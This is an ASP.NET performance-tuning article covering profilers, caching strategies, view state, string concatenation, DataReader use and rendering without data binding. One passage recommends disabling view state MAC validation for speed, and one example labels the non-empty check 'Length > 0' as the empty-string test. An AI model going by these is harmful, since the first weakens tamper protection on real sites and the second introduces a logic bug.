There are many tools out there that you can use to analyze your code and its performance to see where your trouble spots are. Code profilers hook into your assemblies by using the .NET Profiler API, which allows the profilers to run as part of the process being monitored and receive notifications when certain events occur. There are several good profilers out there. I like to use the ANTS code profiler by Red Gate. ANTS is an inexpensive and relatively simple profiler that is limited to recording function and single-line execution times. When an aspx page is run, it can record metrics for the entire call stack, so you can dig down deep into your calls and see how efficient the .NET Framework classes are. ANTS gives you several different metrics for function and line profiling, including max time called, min time called, average time called, and number of times called. This last one is important if you have your site broken into several layers. You can execute a profile on one page and see if the UI layer is making efficient use of your business and data layers by checking whether any functions are called a high number of times. This is an easy way to trim some execution time from your page.
Another profiler that I’ve used is AQTime from AutomatedQA. This profiler has many more metrics, including performance profiler, memory and resource profiler, and an exception profiler. I found that it works really well with .NET exe assemblies, but I couldn’t get it to work with even the simplest web site.
There are several other good profilers available, each of which should have a free trial download for you to play with. Whichever tool you decide to go with, you should become extremely efficient at using it. Two skills that every developer should be an expert at are debugging and using a code profiler.
Another profiler that you should become familiar with, if you are using SQL Server as your database, is the SQL Server Profiler. This is a great tool for monitoring all stored procedure and inline SQL calls being made to SQL Server. You should use this profiler to see if stored procedures are being called more times than they need to be, as well as how long they are taking to execute. This is also a good way to look for data that could be cached on your IIS server. If you see the exact same SQL or stored procedure being executed on different pages, think about implementing one of the caching strategies discussed later.
One tool that I especially like to use is a .NET Test Harness Framework that was written by Nick Wienholt. This is a great tool if you want to compare two different prototypes of a specific piece of functionality. For example, checking for an empty string. You write one test scenario that compares a string to the String.Empty constant, and another scenario that checks for String.Length equal to zero. What makes this framework handy is that, once you write your different test scenarios, you register the test functions with the test harness' delegate and tell it how many times to call the test functions. It will execute each test scenario the specified number of times, using the QueryPerformanceFrequency Win32 API call, to accurately measure how long each test function took to execute. When the test harness is finished, it calculates the min, max and average execution times for each test function. I used this tool to run many of the scenarios that I talk about in the last half of this article.
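To make the idea concrete, here is a minimal sketch of such a harness. This is my own illustration, not Nick Wienholt's actual API; the class names, delegate name, and iteration count are all hypothetical:

```csharp
using System;
using System.Runtime.InteropServices;

// Hypothetical minimal test harness sketching the idea only;
// the real framework's API will differ.
public delegate void TestCase();

public class TinyHarness
{
    [DllImport("kernel32.dll")]
    static extern bool QueryPerformanceCounter(out long count);
    [DllImport("kernel32.dll")]
    static extern bool QueryPerformanceFrequency(out long freq);

    // Runs the test delegate the given number of times and
    // returns the total elapsed time in seconds.
    public static double Time(TestCase test, int iterations)
    {
        long freq, start, stop;
        QueryPerformanceFrequency(out freq);
        QueryPerformanceCounter(out start);
        for (int i = 0; i < iterations; i++)
            test();
        QueryPerformanceCounter(out stop);
        return (stop - start) / (double)freq;
    }
}

// Usage: compare the two empty-string checks mentioned above.
public class Demo
{
    static string s = "";

    public static void Main()
    {
        double a = TinyHarness.Time(new TestCase(CompareToEmpty), 1000000);
        double b = TinyHarness.Time(new TestCase(CheckLength), 1000000);
        Console.WriteLine("String.Empty: {0}s, Length == 0: {1}s", a, b);
    }

    static void CompareToEmpty() { bool x = (s == String.Empty); }
    static void CheckLength()    { bool x = (s.Length == 0); }
}
```

The real framework additionally reports min, max and average per-call times across runs; this sketch only shows the core timing loop.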
When using the test harness, be sure to run your official tests under a Release build. The C# compiler will use some IL code optimizations when compiling for Release that it won’t use when compiling for Debug. Also, if you are testing something that uses hard-coded strings, be aware that the C# compiler will inline string constants and string concatenations into your code at compile time, which could throw off your test results. The best way to avoid this is to pass these strings into your test harness as command-line arguments. This way the compiler won't be able to perform any string optimizations.
You can find a document discussing how to use the test harness framework here.
You can find the code for the test harness framework here.
One last tool I want to mention, one that I have found indispensable while performance tuning, is Anakrino. This tool is an IL disassembler that can take any .NET assembly and disassemble the IL byte code into either managed C++ or C# code. This can be invaluable when a third party or .NET Framework class seems to be causing a problem (a bug or a performance bottleneck). All you have to do is open the offending class in Anakrino and look at the code for yourself to see where the problem lies.
This section is the meat and potatoes of this article. No more preparation and planning, this is where I share the performance specifics that I’ve learned while developing ASP.NET web sites.
While the easiest way to make your site run faster is to beef up your server farm’s hardware, the cost of doing this can be pretty high. But an easy, cost effective way is to squeeze out a few more requests per second by writing good, efficient code.
For the rest of this article, I’m going to make up and talk about a fictional web site that sells Apples. It sells many different kinds of apples and because people all over the world use this site to purchase their apples, it has to perform fast or the users will just drive to their local Safeway and get their apples there. This site is broken up into three different assemblies; a user interface (UI) assembly that has all the aspx pages in it, a business layer assembly that handles business object creation and business logic execution, and a data access layer.
One of the easiest things to implement that can give you a decent performance boost is a caching strategy using the HttpRuntime.Cache class. This class is basically a wrapper around a hashtable that is hosted by the ASP.NET process. This hashtable is thread safe and can be safely accessed by several HTTP requests at the same time. I’m not going to go through the specific APIs for the Cache class (MSDN does a pretty good job of this), but basically you can store objects in the hashtable and later pull them out and use them. The objects in the hashtable can be accessed by any request, as long as they belong to the same application. Each AppDomain has its own hashtable in memory, so if your IIS server hosts several sites, each site can only access the objects that it specifically put in the cache. One important thing to remember about the HttpRuntime.Cache class is that any object you put into it can be accessed by any user in any request. So objects that are either user specific or are often updated after being created and populated are not good candidates for being stored in the cache. Objects that, once created, are fairly read-only are good candidates for this type of caching strategy; objects of this type tend to be used for holding output data only, such as a product or category object.
So how would we use the Cache class? Let’s say that every time a user wanted to see the product page for Granny Smith apples, we could call the database, create an instance of the Product class with Granny Smith data in it, and then return this object to the UI layer. And each time someone wanted to see Granny Smith apples, the site would go through these steps. But that’s a lot more database calls than are necessary. We need to add two more steps into the process. When the UI calls into the business layer for a Granny Smith product, the code first checks to see if the cache contains it. If the cache does, the code just returns it to the UI. But if it doesn’t, the code goes ahead and calls the database and creates a new Product instance. But before we return the apple instance to the UI, the code inserts it into the Cache class. So the next time someone requests the Granny Smith page, the code won’t have to make a call to the database, because the object is being held in the cache.
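A sketch of that check-then-load flow, wrapped in a factory class. The Product class and the ProductData data-layer call are hypothetical stand-ins for whatever your site actually uses:

```csharp
using System;
using System.Web;

public class ProductFactory
{
    // Returns a Product from cache when possible, hitting the
    // database only on a cache miss.
    public static Product CreateProduct(int productId)
    {
        string key = "Product:" + productId;
        Product product = (Product)HttpRuntime.Cache[key];
        if (product == null)
        {
            // Cache miss: load from the database
            // (ProductData is a hypothetical data access layer).
            product = ProductData.LoadFromDatabase(productId);
            HttpRuntime.Cache.Insert(key, product);
        }
        return product;
    }
}
```

Every page that needs a product calls `ProductFactory.CreateProduct(id)`, so the cache lookup lives in exactly one place.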
But there is a flaw in that implementation. What if there is a sudden shortage of Granny Smiths and you need to triple their price? (Remember your micro-economics?) You can make the change to the database, but you still need a way to propagate any changes to the Product table out to your site. One of the cool features of the Cache class is that you can set an expiration timeout for any object you put into the cache, as well as an expiration callback delegate. When your code inserts the Product instance into the cache, you can specify how long you want it to stay in cache. You can also specify a function that should be called when your object expires out of the cache.
So let’s say you set a 10 minute expiration on every Product instance you put into cache, and you also specify the expiration callback delegate. 10 minutes after the Product instance was inserted into cache, the ASP.NET process kicks it out and the callback delegate is called. One of the parameters of the callback delegate is the actual object that was being held in cache. If you stored the product’s database identifier in the Product class, you can use it to query the database for the updated product data. Then you can either create a new Product instance with the returned data or just update the existing object’s properties. Whichever you do, be sure to put the updated instance back into cache (with an expiration and callback delegate, of course). This strategy will give you perpetually updating product objects in memory, which will dramatically decrease the load on your database servers as well as the time it takes to make all those extra database calls.
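A sketch of how that self-refreshing insert might look, using the Cache.Insert overload that takes an absolute expiration and a CacheItemRemovedCallback. The Product type, its Id property, and the ProductData call are hypothetical:

```csharp
using System;
using System.Web;
using System.Web.Caching;

public class ProductCacheLoader
{
    public static void InsertProduct(Product product)
    {
        HttpRuntime.Cache.Insert(
            "Product:" + product.Id,
            product,
            null,                                    // no CacheDependency
            DateTime.Now.AddMinutes(10),             // absolute expiration
            Cache.NoSlidingExpiration,
            CacheItemPriority.Normal,
            new CacheItemRemovedCallback(OnProductExpired));
    }

    // Called by ASP.NET when the item is kicked out of cache.
    static void OnProductExpired(string key, object value,
                                 CacheItemRemovedReason reason)
    {
        // Reload fresh data and re-insert, so the cached object
        // perpetually refreshes itself.
        Product old = (Product)value;
        Product fresh = ProductData.LoadFromDatabase(old.Id);
        InsertProduct(fresh);
    }
}
```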
Like I said before, I’m not going to show a lot of code in this article, and I think the above explanation stands well on its own without coding it out for you. I am, however, going to give you a few design patterns that I think will be helpful in implementing this. First, you should create a custom cache class that encapsulates all calls to the HttpRuntime.Cache. This will keep all caching logic in one place, and if you ever implement a different caching architecture, you only have to rewrite one class. A second pattern is the use of object factories. These are helper classes, a one-stop shop if you will, that you call in order to get object instances. For example, a ProductFactory class might have a CreateProduct method that takes the product ID and returns a Product instance. The CreateProduct function itself handles all the calls to the database layer and to your custom cache class. This way you don’t have object creation logic spread all over your site. Also, if your site uses straight DataSets, DataTables and/or DataRows in the aspx pages instead of creating Product classes, that’s OK; the Cache class works just as well with these objects.
One warning about the caching framework I just described. If you put an extremely large number of objects into the cache and you are using the callback delegate to reload them, you may actually hurt your performance rather than help it. One site I was working on had thousands of categories and tens of thousands of products. When all of these objects were loaded into the cache, the processor pegged at 100% every 10 minutes when the cache was reloading itself. Because of this, we ended up using a caching strategy where all objects expired every 10 minutes, and then would just fall out of scope. So if a user requested the same product within the 10 minute time period they would be saved a call to the database, otherwise the site would have to create a new instance, put it in the cache, and then return it to the UI layer.
Another problem with the self-reloading cache strategy is if a user requests a fairly obscure product, and no one else requests that same product for a week. Your web server will be reloading that product every 10 minutes even though no one is requesting it. The self-perpetuating caching strategy is best for high-volume sites with a smaller product base. Exactly how many objects becomes too many depends on your server’s memory resources and its processor, but PerfMon is a great way of measuring whether the server can handle this strategy.
When inserting an object instance into cache, there is another option that you can use to create a more efficient self-perpetuating caching strategy: a class called CacheDependency. When you insert an object into the HttpRuntime.Cache class, you can also pass in an instance of the CacheDependency class, which acts as a trigger to kick your object out of cache. When the CacheDependency’s trigger is fired, it tells the Cache class to evict the object it is associated with. There are two types of cache dependencies: a file dependency and a cached-item dependency. The file dependency version works by using an internal class called FileChangesMonitor. This class monitors whatever file you specify, and when the file changes, it invokes its FileChangeEventHandler, which the HttpRuntime.Cache class has registered a callback function with. This callback triggers the HttpRuntime.Cache class to kick out whatever object has been associated with the CacheDependency instance.
So how can we use this to create a more efficient self-perpetuating caching strategy? We accomplish this by putting SQL Server triggers on the tables that hold the data that the objects hold. Let’s use our Product class again as an example. And let’s also say that our database has 250 different types of apples in it, each with its own ProductID. We create a trigger on the Product table, so that every time a row in the Product table is changed, it creates a file somewhere on the network and sets the text of the file to “0”. If the file already exists, the trigger would just update the file. The key to this whole strategy is the file name and the text in the file. The text is just one character, and every time the trigger updates the file, you just change the character from “0” to “1” or “1” to “0”. The file name is the ProductID of the product that just got changed.
So when inserting an apple Product object into cache, create a CacheDependency instance that references the file whose name is the ProductID of the object being put into cache. In this case, you do not pass an expiration time into the Cache.Insert() function like before, but you do still specify the callback delegate. Once the Product is inserted into cache, it will stay there until the data in the database is changed. When this happens, the database trigger fires and updates the file. This causes the CacheDependency to trigger, and your Product instance gets kicked out of cache. Your callback function then calls the database, recreates the Product instance with the new data, and inserts it back into the cache. This will dramatically cut down on the number of database calls, and your objects will only refresh when they have to, which will also dramatically cut down on your web server’s processor load.
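The trigger-file variation might be sketched like this. The share path, the file naming convention, and the ProductData call are all assumptions carried over from the scenario above, not a fixed API:

```csharp
using System;
using System.Web;
using System.Web.Caching;

public class TriggeredProductCache
{
    public static void InsertProduct(Product product)
    {
        // The trigger file's name matches the ProductID; the database
        // trigger rewrites this file whenever the row changes.
        string triggerFile = @"\\fileserver\triggers\" + product.Id + ".txt";

        HttpRuntime.Cache.Insert(
            "Product:" + product.Id,
            product,
            new CacheDependency(triggerFile),   // file change evicts the item
            Cache.NoAbsoluteExpiration,         // no timed expiration this time
            Cache.NoSlidingExpiration,
            CacheItemPriority.Normal,
            new CacheItemRemovedCallback(OnProductChanged));
    }

    static void OnProductChanged(string key, object value,
                                 CacheItemRemovedReason reason)
    {
        // The row changed in the database: reload and re-insert.
        Product fresh = ProductData.LoadFromDatabase(((Product)value).Id);
        InsertProduct(fresh);
    }
}
```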
Another hashtable that you can take advantage of for a caching strategy is the HttpContext.Current.Items class. This class was originally designed for sharing data between IHttpModule and IHttpHandler instances during an HTTP request, but there is nothing stopping you from using it within an aspx page or any assembly within the call stack that your aspx page starts. The scope of this hashtable is the duration of a single HTTP request, after which it falls out of scope, along with any objects it references.
This hashtable is the perfect place to store objects that have a short lifespan but are accessed multiple times during the span of a single request. A good example of this might be connection strings that your site stores in a file or in the registry. Let’s say your data access assembly has to read its connection strings from the registry and decrypt them each time it calls the database. If the data access assembly is called several times during a single request, you could end up reading the registry and decrypting the connection string more often than necessary. One way around this repetition is to put the decrypted connection string into the HttpContext.Current.Items hashtable the first time it’s needed during each request; every subsequent time your data access assembly is called during that request, it can just pull the connection string from the HttpContext.Current.Items class. Now I know what you may be thinking: why not just store the connection strings in a static field and hold them for the lifetime of the application? The reason I would stay away from this is that if you ever needed to change your connection strings in the registry, you would have to restart your web application in order to get them reloaded into your static fields. But if they are only stored for the life of each request, then you can change the registry without fear of bumping people off your site.
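A sketch of that per-request caching. The Crypto and Registry helper classes here are hypothetical placeholders for however your site actually reads and decrypts its connection strings:

```csharp
using System.Web;

public class ConnectionStringProvider
{
    public static string GetConnectionString()
    {
        // Cached for the duration of this HTTP request only.
        string cs = (string)HttpContext.Current.Items["ConnString"];
        if (cs == null)
        {
            // First use in this request: read the encrypted string from
            // the registry and decrypt it (hypothetical helpers).
            cs = Crypto.Decrypt(Registry.ReadConnectionString());
            HttpContext.Current.Items["ConnString"] = cs;
        }
        return cs;
    }
}
```

However many times the data access layer runs per request, the registry read and decryption happen at most once.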
Now connection strings might not be a very good example, but there are many types of objects that can take profitable advantage of this caching strategy. For instance, if you are using Commerce Server, then this is a really good place to store objects such as CatalogContexts or ProductCatalog objects, which can get created many times during a single HTTP request. This will give you a great performance gain in your site.
Page and control caching is an obvious tool and is very well documented in MSDN, as well as in many ASP.NET books, so I won’t go over it here except to say: use it where possible. These techniques can dramatically increase your requests per second metric.
When ASP.NET first came out, and I heard of view state and what it did, I was overjoyed! Then I actually saw just how much text there was in the View State and my joy disappeared. The problem with view state is that it not only stores the data on the page, but it also stores the color of the text, the font of the text and height of the text, the width, the…well, you get the picture. One of the pages we developed was so large that the view state was 2 meg! Imagine trying to load that page in a 56K modem.
Now, I’m not smart enough to suggest to Microsoft how to create a better view state, but I do know that on some pages you just can’t use it. It’s just too big and it takes too long to download. And granted, with view state on, you don’t have to reload your entire page on a post back, but if you have an efficient HTML rendering strategy (which I’ll talk about last) then I think the time cost of re-rendering the page will offset the time it takes to download the view state to the client (Not to mention the time it takes to decode and encode the view state for each request).
If you do decide to use view state, take a look in your machine.config file, in the <pages> element, and make sure that the enableViewStateMac attribute is set to "false". This attribute tells ASP.NET whether to append a message authentication code (MAC) to the view state so that tampering can be detected on post back. I don’t like to put anything confidential in the view state, and hence don’t care whether it’s validated or not; just be aware that with the MAC disabled, a client can alter the view state without the server noticing, so only do this on pages where that is acceptable. Setting this value to false will also save you a little bit of time per page, especially if your page is carrying a large amount of view state.
One quick note that might save you a few days of troubleshooting: if you do set enableViewStateMac to true and you are operating in a load-balanced server farm, you will also need to make sure that each server uses the same keys. The algorithm that ASP.NET uses to validate view state is based on a machine key, which means view state generated on server ‘A’ won’t validate if server ‘B’ handles the return request, and you’ll get a view state exception. To fix this problem, set the validationKey attribute of the <machineKey> element in the machine.config file to a hexadecimal string from 40 to 128 characters long (128 characters is recommended). You’ll need to set this on every web server with the same key. This will let view state generated on one server be validated and used on another.
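The shape of the element looks like this; the key values below are placeholders, and you should generate your own random hex strings rather than copy these:

```xml
<!-- machine.config on every server in the farm. The key values are
     placeholders - generate your own random hex strings. -->
<machineKey
    validationKey="0123456789ABCDEF...(40 to 128 hex characters)..."
    decryptionKey="FEDCBA9876543210...(hex characters)..."
    validation="SHA1" />
```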
I have two other config file observations that do not really fit anywhere else, and since I just talked about the machine.config, this is as good a spot as any. There is an attribute in the machine.config file that lets you allocate the percentage of the web server’s memory available for use by the ASP.NET process. This is the memoryLimit attribute of the <processModel> element. Its default value is 60%, but I’ve found that I can get away with 80% without any adverse effects on the web server, and if you are implementing some sort of caching strategy, as discussed above, and your product list is fairly extensive, this is something you may want to consider changing.
The second item is the <compilation> element in the web.config file. This element has an attribute called debug. When moving your code over to production, you should make sure to change this to 'false'. This attribute does not affect the C# or VB.NET compilation of your code into an assembly. If you compile your assembly with this setting set to true, then again with it set to false, and then compare the IL code of the two assemblies using ILDASM, you won’t see any difference between the two compilations. But this attribute does affect the JIT compiler, and your site will run a little faster with it set to false, because the JIT can apply optimizations that are disabled in debug mode.
One of the classes that Microsoft released with the .Net Framework was the StringBuilder class in the System.Text namespace. This class is a high performance way to concatenate text together to build large text blocks. String concatenation in the old ASP days was extensively used to help build HTML output, but it really hurt page performance. So now that we have the StringBuilder, you might think that it is the best choice for string concatenation, right? Well, yes and no. It depends on the situation and how you use it.
The general rule for string concatenation is use the StringBuilder if you are going to concatenate 5 or more strings together. For 2 – 4 strings, you should use the static String.Concat function. The String.Concat function takes two or more strings and returns a new string that is a concatenation of all the ones passed in. You can also pass in any other data type into the Concat function, but it will just call ToString() on these types and do straight ‘+’ style string concatenation on them, so I’d avoid using it for anything but strings.
If you take a look at the String.Concat method in Anakrino (in the mscorlib file), you’ll see that if you pass 2 or more strings into the function, the function first adds up the total number of characters for all the strings passed in. It then calls an extern FastAllocateString function, passing in the size of the new string it is going to build, which I assume allocates a block of memory big enough to hold the entire return string. Then for each string passed in, Concat calls another extern function called FillStringChecked. This function takes a pointer to the block of memory that was allocated in FastAllocateString, the beginning place in memory for the string being added, the ending point in memory, and the string to add. It does this for each passed in string to build the newly concatenated string, which it then returns. This is a very fast way to concatenate 2 – 4 strings together, and from my tests with the .NET Test Harness, the String.Concat function outperforms the StringBuilder by 130%.
This sounds straightforward enough, right? For 2 – 4 strings, use String.Concat, and for 5+ strings, use StringBuilder. Well, almost. I got an idea in my head and thought I’d profile it in the .NET Test Harness, as well as PerfMon, to see what would happen. Since String.Concat can take up to 4 strings, why not use one String.Concat to concatenate the outputs of 4 inner String.Concat calls? So I set up the test and found that for up to 16 strings, nesting String.Concat functions inside an outer String.Concat call outperformed the StringBuilder class by 180% (1.8 times faster). The other thing I found with this method was that the PerfMon counter, % Time in Garbage Collector, was much lower when using nested String.Concat functions (but in order to see this, you’ll have to perform the test thousands of times in a row). This is great news if your site does a large amount of string concatenation. The only problem with nesting String.Concat functions is that it makes the code fairly hard to read. But if you really need to boost your page performance, then you might want to consider it.
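The nested pattern looks like this; s1 through s16 stand in for whatever strings you happen to be joining:

```csharp
// One outer String.Concat joining the results of four inner String.Concat
// calls - up to 16 strings with no StringBuilder and fewer temporary
// strings than chained '+' concatenation.
string result = String.Concat(
    String.Concat(s1,  s2,  s3,  s4),
    String.Concat(s5,  s6,  s7,  s8),
    String.Concat(s9,  s10, s11, s12),
    String.Concat(s13, s14, s15, s16));
```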
If you find that you need to use the StringBuilder to build large blocks of text, there are a few things you can do to make it work a little faster. If you use the default constructor, the StringBuilder starts with an initial capacity of 16 characters; any time you add more text than it can hold, it doubles its character capacity. So by default, it will grow from 16 characters, to 32, to 64, to…you get the picture. But if you have a good idea as to how big the string you are trying to build will be, one of the StringBuilder constructors takes an Int32 value that initializes its character capacity. This can give you better performance, because if you initialize the StringBuilder to 1000, it won’t have to allocate more memory until you pass in the 1001st character. The performance gain from pre-initializing the StringBuilder isn’t all that much, about 10% – 15% depending on the size of the finished string, but it’s worth playing around with if you have a good idea how many characters you are going to add.
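As a sketch, assuming you are building an HTML list from some collection (the products list here is hypothetical):

```csharp
// Pre-size the StringBuilder when the final length is roughly known,
// avoiding the grow-and-copy cycle (16 -> 32 -> 64 -> ...).
StringBuilder sb = new StringBuilder(1000); // initial capacity, not a hard limit
for (int i = 0; i < products.Count; i++)
{
    sb.Append("<li>");
    sb.Append(products[i].Name);
    sb.Append("</li>");
}
string html = sb.ToString();
```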
There is one more item I’d like to address when talking about strings, and that is checking for an empty string. There are two basic ways to check if a string is empty or not. You can compare the string to the String.Empty static property, which is just a constant for “”:
if (firstName == String.Empty)
Or you can check the length of the string, like this:
if (firstName.Length > 0)
I set up a test in the .NET Test Harness and found that the String.Empty comparison check was 370% slower than the length check. This may seem fairly trivial, but every little bit helps, right?
If you have any classes that have a fair number of private fields, there are two different techniques you can use to initialize the class' private fields, and which one you pick can affect performance. Here is a common scenario. Let's say you have a Product class that has 45 private fields, 45 public properties that encapsulate them, and two constructors; a default constructor that will create an empty product and one that takes a DataRow that is used to populate the 45 fields. You should initialize the 45 fields somewhere because if you create an empty product, you might want to give your properties some default values. But where should you initialize the fields? Where they are declared or in default constructors?
If your code uses the technique that initializes the fields where they are declared like:
private int maxNumberAllowed = 999;
and then you create a new Product instance using the default constructor, then you have a perfectly good Product instance that you are ready to use. But what happens if you create a new Product instance using the DataRow constructor? Each field will be assigned to twice! Once when it gets declared and a second time in the DataRow constructor.
The best practice is to do all class level field initializations in the constructors. You may end up duplicating your initialization code in each constructor, but you’ll be guaranteed that each private field gets assigned to only once per class creation.
So to show what this can do to performance, I created a test with the .NET Test Harness. I created two classes, each with 50 private fields. The first class initialized its private fields where they were declared, and the second class did all initialization in the constructors. Both classes have two constructors, a default one and a DataRow one. When I created a Product instance using the DataRow constructor, the class that initialized its private fields where they were declared was 50% slower than the class that had all its initialization code in the constructors. When I created a new Product instance by calling the default constructor, both versions were relatively the same.
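A trimmed-down sketch of the constructor-only initialization style; the DataRow column names are assumptions for illustration:

```csharp
// All field initialization lives in the constructors, so each field is
// assigned exactly once per instance - shown with 2 of the 45 fields.
public class Product
{
    private int maxNumberAllowed;
    private string name;

    public Product()                 // empty product gets its defaults here
    {
        maxNumberAllowed = 999;
        name = String.Empty;
    }

    public Product(DataRow row)      // populated product: still one assignment per field
    {
        maxNumberAllowed = (int)row["MaxNumberAllowed"]; // hypothetical columns
        name = (string)row["Name"];
    }
}
```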
I’m not going to spend a lot of time going over exception handling, except to say that throwing exceptions is very costly for performance. You only want to use a try / catch block when you need to trap an error. You never want to use it to control and direct the program’s flow.
For example, I’ve seen this code used (and the .NET Framework actually uses this in its VB function IsNumeric):
public bool IsNumeric(string val)
{
    try
    {
        int number = int.Parse(val);
        return true;
    }
    catch
    {
        return false;
    }
}
What if you have an XML block that has 50 values and you want to see if all 50 are numeric? If none of the values in the XML block are numeric, then you just threw 50 exceptions needlessly!
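If you are on a later version of the framework (2.0 or newer), int.TryParse reports failure through its return value instead of an exception, so those 50 checks cost 50 cheap boolean tests rather than 50 thrown exceptions:

```csharp
// Exception-free numeric check using int.TryParse (.NET 2.0+).
public bool IsNumeric(string val)
{
    int number;
    return int.TryParse(val, out number);
}
```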
Multithreading is a powerful way to get a few more requests per second out of your site. I am by no means an expert in multithreading, so I won't pretend to know enough to give you some insight into its usage. I can recommend a book by Alan Dennis called ‘.NET Multithreading’ since he does a good job describing the ins and outs of multithreading. I do want to mention a warning though. While multithreading can be very powerful and speed up your pages, if you are not extremely careful it can introduce very subtle and hard to debug problems in your code. Also, it’s commonly thought that your code can just spawn off as many threads as it needs to get the job done. But creating too many threads will actually hurt performance. Remember, there are only so many processors on your server and they are shared across all threads.
Having a disconnected data source such as DataSets is great, and the ability to make changes to your disconnected DataSet and then reconnect to your data source and sync the changes is truly amazing. But in my opinion, this should strictly be used when performance is not an issue. For read only database access, the DataReader will give you an amazing performance gain over the DataSet.
I once again used the .NET Test Harness and created two tests. The first test made a call to my database, filled a DataSet with 50 rows of 10 columns, iterated through each DataRow in the DataTable, and pulled the data out of each column in the DataRow. The second test did the same thing, except with a DataReader. Since the DataAdapter uses a DataReader internally to populate the DataSet (I used the Anakrino tool to look into the internals of the DataAdapter), I assumed that it would be faster than the DataSet. But I was surprised at how much faster the DataReader really was. Under both Debug and Release builds, the DataReader was 75% faster than the DataAdapter!
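For read-only access, the DataReader loop looks something like this; the connection string and stored procedure name are placeholders, not part of the test described above:

```csharp
// Forward-only, read-only access with a SqlDataReader.
ArrayList names = new ArrayList();
using (SqlConnection conn = new SqlConnection(connectionString))
{
    SqlCommand cmd = new SqlCommand("GetProducts", conn); // hypothetical proc
    cmd.CommandType = CommandType.StoredProcedure;
    conn.Open();
    SqlDataReader reader = cmd.ExecuteReader();
    while (reader.Read())
    {
        names.Add((string)reader["Name"]); // direct cast, no ToString()
    }
    reader.Close();
}
```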
But what about the DataSet’s built in ability to update any changes to the database? True, the DataReader can’t handle this. But in my opinion, the best strategy for high speed database access, meaning read, update, insert and delete, is through the use of stored procedures. I’m not going to go into any detail in that area, since it is outside of the scope of this article. My rule of thumb is to try and avoid using DataSets altogether in web development. I generally will only use them in my WinForm applications when I’m trying to appease only one user per AppDomain.
The biggest argument I hear when telling people not to use DataSets in web development is that they are so handy for data binding to ASP.NET web controls, you can’t bind a Repeater control to a DataReader. As with DataSets, my rule of thumb for data binding is ‘don’t do it!’, and I’ll tell you why in the next section.
Repeater
The final topic I wanted to cover is how to pull data out of a DataSet (if you insist on using them) or a DataReader. Both the DataRow and the DataReader have indexers for accessing column values. One of the most commonly used ways to get data out of these objects is to call the ToString() method on the indexer, like this:
string temp = dataReader["FirstColumn"].ToString();
This is OK. But what if you are trying to get an Int32 out of the DataReader instead of a string? This is one way I’ve seen:
int temp = int.Parse(dataReader["FirstColumn"].ToString());
The other way that I see is this:
int temp = (int)dataReader["FirstColumn"];
So can you guess which one is faster? If you guessed the second one, then you’re correct. DataReaders and DataSets store their underlying data as object types, so you can cast the Int32 directly out of the DataReader. If you call ToString() first, you convert the boxed value to a string and then call Int32.Parse on that string, which parses it back into an Int32. This may seem like common sense, but I have seen code that uses the ToString() method, so I was interested in just how much faster the direct cast was. When I used the .NET Test Harness, I found the direct cast was 3 times faster! That’s a pretty huge performance gain to miss out on because of a simple casting mistake.
The one other way to get data out of a DataReader is to use its DataReader.Getxxx methods. The main reason I try to avoid using them is that they only take a numeric column ordinal. I try to use the column names in the indexer, because if you ever change the order of the columns in your stored procedure, you won’t introduce a subtle bug into your code.
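That said, if you do want the typed Getxxx accessors without hard-coding column numbers, GetOrdinal lets you resolve the name to an ordinal once, outside the read loop:

```csharp
// Resolve the ordinal from the column name once, then use the typed
// accessor - no magic column numbers scattered through the code.
int firstColumn = reader.GetOrdinal("FirstColumn");
while (reader.Read())
{
    int temp = reader.GetInt32(firstColumn);
    // use temp here
}
```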
When .NET was released, many web developers were ecstatic when they saw how easy it was to use server side ASP.NET controls. Slap the control on the page, assign a DataSet or ArrayList to the DataSource property, call DataBind(), and away you go: instant web pages. No more looping through RecordSets in your ASP to build your HTML. This is so easy!
It is easy, but at a cost. I recently worked on a project that used data bound ASP.NET DataList and Repeater controls extensively to build their web pages. But the performance results were very disappointing. Using ACT to run some load tests on these pages, with a small number of concurrent users (5), the page performed reasonably well. But as soon as we increased the number of users to something more realistic, like 25, the page performance went to pot. So we started using PerfMon while the tests were running, and found something pretty interesting. The % time in garbage collection for the page was averaging 30%, with a maximum spike of 45%! Also, the % Processor was pegged at 95% for the entire test run. These last two statistics were big red warning lights, because they told us that not only did our pages run slow, but they were not going to be able to scale out at all. If the site had a high load of users, it would be in serious trouble.
This was no good and was not acceptable for a release to production, so we started digging into how the data bound controls worked. What we found out was that the data binding process was doing two things that were hurting performance. First, data bound controls use reflection to find the correct property and pull the data from it. Reflection is fairly costly and if you have a repeater control that is pulling 6 properties from an array of 40 objects, the performance hit can really add up.
The second thing we noticed was that the number of objects that were being created during the data binding process was pretty high (look in Anakrino at the DataGrid, DataList and Repeater class’ CreateControlHierarchy to see how it does its binding). This high number of objects being created was what was kicking the % time in garbage collection so high.
So we had to find a way to create web pages without using data binding. We tried using ASP.NET server controls and manually pushing the data, but this didn’t really change our statistics very much. Then we got desperate, and really started brainstorming. We tried placing one Literal control on each page and used a StringBuilder in the code behind’s PageLoad event to build the HTML structure for the page and then slapping the HTML into the Literal control’s text property. This technique performed amazingly well and the % time in garbage collection went down to almost nothing. But the maintainability of the HTML would have been a nightmare.
We then decided to try mixing ASP.NET code behind with an ASP style of HTML building. We created and populated all our data objects, and put any business logic the page needed, in the aspx’s code behind Page_Load event. Then in the aspx file, we went back to ASP style HTML building, using old fashioned <%=(C# code)%> to actually insert data from our data objects into the HTML. This technique performed just as well as the StringBuilder technique, but the maintainability of the code was much better.
The only problem with this ASP style of HTML rendering is that you are back to writing the HTML to a forward only stream, just like ASP. When using ASP.NET controls, you can update the value of any control, during any stage in the code. But web developers have been doing this since the beginning of ASP, so in extreme situations where ASP.NET controls just won’t perform, then this is a workable option.
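A minimal sketch of the aspx side of this technique; it assumes the code behind's Page_Load has already populated a protected ArrayList field named products (the field and class names are illustrative):

```aspx
<%-- Old-style inline rendering: no server controls, no data binding. --%>
<ul>
<% for (int i = 0; i < products.Count; i++) {
       Product p = (Product)products[i]; %>
    <li><%= p.Name %></li>
<% } %>
</ul>
```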
Once we had our test page coded this way, I ran ACT on the data bound version and the new ASP style version, and compared the results. During a 15 minute run with 10 users, the ASP style page was able to run roughly twice as many iterations as the data bound version. The average requests per second jumped from 72.55 to 152.44. The average time to last byte went from 21.79 milliseconds down to an amazing 2.57 milliseconds! But the best statistics came from the % time in garbage collection and the processor %. The average % time in garbage collection went from 30% down to .79%, and the average processor % went from 95% down to 10%! This meant that our ASP style pages would scale out to a higher number of users with very little trouble.
